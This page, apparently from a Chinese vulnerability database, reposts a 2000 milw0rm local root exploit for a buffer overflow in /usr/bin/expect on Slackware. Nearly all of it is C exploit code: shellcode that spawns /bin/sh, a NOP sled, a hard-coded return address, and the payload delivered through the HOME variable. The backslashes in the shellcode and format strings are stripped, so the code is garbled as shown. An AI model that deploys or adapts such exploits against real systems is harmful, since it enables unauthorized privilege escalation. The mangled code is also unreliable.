expect (/usr/bin/expect) – Local Buffer Overflow
漏洞ID | 1053496 | 漏洞类型 | |
发布时间 | 2000-12-04 | 更新时间 | 2000-12-04 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/* hhp-expect_smash.c (12/11/00)
*
* expect (/usr/bin/expect) buffer overflow.
* Tested 5.31.8 and 5.28.1, slackware 7.x (Maybe others).
*
* By: isox
* Site: www.hhp-programming.net
* Advisory: www.hhp-programming.net/ouradvisories/hhp-expect_adv%2317.txt
*/
#include <stdio.h>
#include <stdlib.h>
#define NOP 0x90
#define OFFSET 0
#define BUFLEN 416
#define RET 0xbffff580 /* Slackware 7.1 */
#define EXPECT "/usr/bin/expect"
char code[] =
"x31xc0x31xdbxb0x17xcdx80x66x31xc0x66x31"
"xdbxb0x2excdx80xebx1fx5ex89x76x08x31xc0"
"x88x46x07x89x46x0cxb0x0bx89xf3x8dx4ex08"
"x8dx56x0cxcdx80x31xdbx89xd8x40xcdx80xe8"
"xdcxffxffxff/bin/shx69";
void usage(char *arg) {
fprintf(stderr, "nUsage: %s [offset up/down] [eip]nn", arg);
fprintf(stderr, "Examples:n");
fprintf(stderr, "t%s 347 up -=- Default EIP increased by 347 bytesn", arg);
fprintf(stderr, "t%s 347 down -=- Default EIP decreased by 347 bytesn", arg);
fprintf(stderr, "t%s 429 up 0x%lx -=- EIP set to 0x%lx and increased by 429 bytesn", arg, RET, RET + 429);
fprintf(stderr, "t%s 429 down 0x%lx -=- EIP set to 0x%lx and decreased by 429 bytesnn", arg, RET, RET - 429);
exit(1);
}
int main(int argc, char *argv[]) {
char *buf, *p;
long *addressp, address;
int offset=OFFSET;
int i;
if((argc < 3) || (argc > 4))
usage(argv[0]);
if(argc == 3) {
if(!strcmp(argv[2], "up")) {
address = RET + atoi(argv[1]);
printf("Increasing offset by: %dn", atoi(argv[1]));
printf("Increasing EIP to: 0x%xnn", RET + atoi(argv[1]));
}
if(!strcmp(argv[2], "down")) {
address = RET - atoi(argv[1]);
printf("Decreasing offset by: %dn", atoi(argv[1]));
printf("Decreasing EIP to: 0x%xnn", RET - atoi(argv[1]));
}
}
if(argc >= 4) {
if(!strcmp(argv[2], "up")) {
address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);
printf("Setting EIP to: 0x%xn", strtoul(argv[3], NULL, 16));
printf("Increasing offset by: %dn", atoi(argv[1]));
printf("Increasing EIP to: 0x%xnn", (strtoul(argv[3], NULL, 16) + atoi(argv[1])));
}
if(!strcmp(argv[2], "down")) {
address = strtoul(argv[3], NULL, 16) + atoi(argv[1]);
printf("Setting EIP to: 0x%xn", strtoul(argv[3], NULL, 16));
printf("Decreasing offset by: %dn", atoi(argv[1]));
printf("Decreasing EIP to: 0x%xnn", (strtoul(argv[3], NULL, 16) - atoi(argv[1])));
}
}
if (!(buf = (char *)malloc(BUFLEN))) {
printf("Can't allocate memory.n");
exit(-1);
}
p = buf;
addressp = (long *) p;
for (i = 0; i < BUFLEN; i+=4) {
*(addressp++) = address;
}
for (i = 0; i < (BUFLEN - strlen(code) - 4); i++) {
buf[i] = NOP;
}
p = buf + (BUFLEN - strlen(code) - 4);
for (i = 0; i < strlen(code); i++)
*(p++) = code[i];
buf[BUFLEN] = ' ';
setenv("HOME", buf, 1);
system(EXPECT);
}
// milw0rm.com [2000-12-04]
Sun的ping程序缓冲区溢出漏洞 漏洞ID 1207293 漏洞类型 缓冲区溢出 发布时间 1998-09-09 更新时间 1998-09-09 CVE编号 CVE-1999-0056 CNNVD-ID CNNVD-199809-011 漏洞平台 N/A C…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧